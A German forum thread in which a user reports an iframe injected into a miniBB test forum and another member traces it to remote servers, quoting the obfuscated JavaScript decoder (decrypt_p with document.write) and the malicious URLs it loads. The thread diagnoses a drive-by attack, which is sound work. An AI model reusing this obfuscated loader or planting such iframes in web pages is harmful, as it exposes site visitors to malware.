Moin!

habe soeben feststellen müssen, dass jemand, k.a. wie, in dem testforum http://www.aktuell-online.info/forum/ linksoben (im mozilla sieht mans so; ansonsten in der source die erste zeile...) einen link eingeschleußt hat.

Es ist kein Link, es ist ein IFrame.

hat da irgendwer einen bug von minibb ausgenutzt oder wie würde diese datei geändert?

Kann man nicht sagen, es steht kein Änderungsprotokoll dabei, aus dem das hervorgeht.

- Sven Rautenberg

Hallo,

die eingebundene Resource http://85.255.113.4/dl/adv448.php stammt aus der Ukraine und läd vom selben Server Javascriptcode nach (http://196.regvista.com/index.php?ref=vish)

function decrypt_p(x){  
 var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;  
 var t=Array(63,2,40,17,19,1,9,53,5,30,0,0,0,0,0,0,42,18,16,28,54,14,13,33,37,45,56,52,35,39,49,61,10,55,24,22,38,44,26,20,47,48,32,0,0,0,0,6,0,11,34,29,57,58,3,21,41,27,59,4,12,31,46,43,60,36,15,7,8,50,51,62,25,23,0);  
 for(j=Math.ceil(l/b);j>0;j--){  
  r='';  
  for(i=Math.min(l,b);i>0;i--,l--){  
   w|=(t[x.charCodeAt(p++)-48])<<s;  
   if(s){  
    r+=String.fromCharCode(165^w&255);  
    w>>=8;s-=2  
   }  
   else{  
    s=6  
   }  
  }  
  document.write(r)  
 }  
}decrypt_p("81")

Dieser wird, weil dank Status 302 gleich auf die nächst nicht mehr zu erreichende Resource (http://apjuydguldid92pp5upp5c77p.affrontgl.com/?a) verwiesen wird, nicht ausgeführt. Ich würde vermuten, da versucht jemand einen Bug in MiniBB auszunutzen.

Gruß aus Berlin!
eddi

--
PHP: PHP unter Linux installieren, in Bearbeitung PHP Konfigurieren